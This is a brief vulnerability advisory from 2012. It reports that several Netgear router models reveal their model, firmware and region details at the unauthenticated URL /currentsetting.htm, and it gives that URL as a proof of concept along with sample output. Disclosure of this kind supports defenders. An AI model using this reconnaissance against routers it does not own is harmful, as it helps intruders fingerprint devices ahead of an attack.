Netgear Information DisclosureNetgear Information Disclosure
Summary
Several NETGEAR devices are vulnerable to information disclosure via the web interface.
Description
| Models: | DGND3300v2, WNR2000v2, DGN1000, N300 |
| Firmwars: | V2.1.00.48_1.00.48, V1.1.0.41WW, V1.0.0.34_29.0.45NA |
| Date: | 26/05/2012 |
| Severity: | Low |
| Impact: | Reveals model version, firmware and other info. |
| Atack Vector: | Remote without authentication |
| Solution: | No solution |
| Reference: | CVE not available |
Several Netgear devices are vulnerable to information disclosure. It is posible to obtain model version, firmware and other information by visiting the URL /currentsetting.htm without authentication
POC
Open the following URL:
http://<IP>/currentsetting.htm
Screenshot
Firmware=A2.1.00.48_1.00.48 RegionTag=DGND3300_WW Region=ww Model=DGND3300v2
Firmware=V1.1.0.41WW RegionTag=DGN1000_WW Region=WW Model=DGN1000
Firmware=V1.0.0.34_29.0.45NA RegionTag=WNR2000v2_NA Region=us Model=WNR2000v2
Pedro Joaquín
pjoaquin[]websec.mx
YOUTUBE
TWITTER
FACEBOOK
BLOG
EMAIL US